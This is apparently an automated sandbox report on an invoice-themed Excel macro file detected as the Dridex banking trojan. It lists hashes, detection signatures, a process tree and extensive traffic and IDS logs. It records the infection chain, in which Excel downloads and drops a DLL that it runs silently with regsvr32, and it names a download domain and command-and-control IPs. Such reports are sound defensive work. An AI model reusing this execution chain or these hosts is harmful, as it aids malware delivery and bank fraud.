
Analysis Report INV3867196801-20210111675616.xlsm

Overview

General Information

Sample Name: INV3867196801-20210111675616.xlsm
Analysis ID: 338155
MD5: 9b7c2b0abf5478ef9a23d9a9e87c7835
SHA1: 6931c4b845a8a952699d9cf85b316e3b3d826a41
SHA256: a463f9a8842a5c947abaa2bff1b621835ff35f65f9d3272bf1fa5197df9f07d0

Detection

Hidden Macro 4.0 Dridex
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Dridex e-Banking trojan
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Machine Learning detection for dropped file
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query network adapter information
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops certificate files (DER)
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the installation date of Windows
Registers a DLL
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1296 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
      • regsvr32.exe (PID: 2352 cmdline: -s C:\Users\user\AppData\Local\Temp\jczxic.dll. MD5: 432BE6CF7311062633459EEF6B242FB5)
    • DW20.EXE (PID: 2412 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 2360 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2440 cmdline: C:\Windows\system32\dwwin.exe -x -s 2360 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started; Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416
Sigma detected: Regsvr32 Anomaly
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1296, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\jczxic.dll., ProcessId: 2416

Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.270000.1.raw.unpack; Malware Configuration Extractor: Dridex {"Config: ": ["--------------------------------------------------", "BOT ID", "--------------------------------------------------", "Bot id : 61074", "--------------------------------------------------", "IP Address table", "--------------------------------------------------", "Address count 0"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zip; ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\jczxic.dll; ReversingLabs: Detection: 36%
Multi AV Scanner detection for submitted file
Source: INV3867196801-20210111675616.xlsm; Virustotal: Detection: 33%
Source: INV3867196801-20210111675616.xlsm; ReversingLabs: Detection: 32%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\jczxic.dll; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\d4bfa7nne[1].zip; Joe Sandbox ML: detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown; HTTPS traffic detected: 185.2.4.104:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49180 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49184 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49188 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49192 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49196 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49200 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49204 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49208 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49212 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49216 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49220 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49224 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49230 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49234 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49238 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49242 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49246 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49250 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49254 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49258 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49262 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49266 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49270 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49274 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49278 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49282 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49286 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49290 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49294 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49298 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49302 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49306 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49310 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 192.168.2.22:49310 -> 77.220.64.37:443 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49314 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49318 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49322 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49326 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49330 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49334 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49338 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49342 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49346 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49350 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49354 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49358 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49362 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49366 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49370 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49374 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49378 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49382 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49386 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49390 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49394 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 77.220.64.37:443 -> 192.168.2.22:49398 version: TLS 1.2
Source: C:\Windows\SysWOW64\regsvr32.exe; Code function: 4_2_002DCEF8 FindFirstFileExW,4_2_002DCEF8

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: C:\Users\user\AppData\Local\Temp\jczxic.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; File created: d4bfa7nne[1].zip.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE; Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic; DNS query: name: www5.ritamartins.pt
Source: global traffic; TCP traffic: 192.168.2.22:49165 -> 185.2.4.104:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49168
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49169
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49170
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49172
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49173
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49174
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49176
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49177
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49178
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49180
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49181
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49182
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49184
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49185
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49186
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49188
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49189
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49190
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49192
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49193
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49194
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49196
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49197
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49198
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49200
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49201
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49202
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49204
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49205
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49206
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49208
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49209
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49210
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49212
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49213
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49214
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49216
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49217
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49218
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49220
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49221
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49222
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49224
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49225
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49227
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49230
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49231
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49232
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49234
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49235
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49236
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49238
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49239
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49240
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49242
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49243
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49244
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49246
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49247
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49248
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49250
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49251
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49252
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 77.220.64.37:443 -> 192.168.2.22:49254
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 80.86.91.27:3308 -> 192.168.2.22:49255
Source: Traffic; Snort IDS: 2023476 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
Source: Traffic; Snort IDS: 2022535 ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex) 5.100.228.233:3389 -> 192.168.2.22:49256
